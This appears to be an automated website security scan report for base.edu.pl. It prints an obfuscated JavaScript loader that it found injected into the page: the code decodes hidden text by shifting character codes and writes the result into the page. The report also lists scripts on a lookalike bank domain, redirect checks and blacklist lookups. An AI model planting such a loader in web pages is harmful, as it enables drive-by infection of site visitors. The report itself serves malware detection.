Scanned pages/files
Request | Server response | Status |
http://base.edu.pl/ | 200 OK Content-Length: 3363 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var AFD3E3D9E3C678958BC3 = -86+96;var A200312354ECA26EB9EF = document.getElementById('c26B14DD9C95ED1B8F3550C').innerHTML;var c26e34eb22A0C0FCBDDE666DD05690 = new String;A200312354ECA26EB9EF = A200312354ECA26EB9EF.substr(4,531);for(i=0;i<A200312354ECA26EB9EF.length;i++) c26e34eb22A0C0FCBDDE666DD05690 += String.fromCharCode(A200312354ECA26EB9EF.substr(i,1).charCodeAt()-AFD3E3D9E3C678958BC3);document.write(c26e34eb22A0C0FCBDDE666DD05690); Antivirus reports:
| ||
http://jpchase.cn/js.js | 500 Can't connect to jpchase.cn:80 (Bad hostname) Content-Length: 152 Content-Type: text/plain | clean |
http://jpchase.cn/test404page.js | 500 Can't connect to jpchase.cn:80 (Bad hostname) Content-Length: 152 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: base.edu.pl
Result:
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2014 07:52:23 GMT
Server: IdeaWebServer/v0.80
Content-Type: text/html
GET / HTTP/1.1
Host: base.edu.pl
Result:
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2014 07:52:23 GMT
Server: IdeaWebServer/v0.80
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: base.edu.pl
Referer: http://www.google.com/search?q=base.edu.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: base.edu.pl
Referer: http://www.google.com/search?q=base.edu.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=base.edu.pl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://base.edu.pl/
Result: base.edu.pl is not infected or malware details are not published yet.
Result: base.edu.pl is not infected or malware details are not published yet.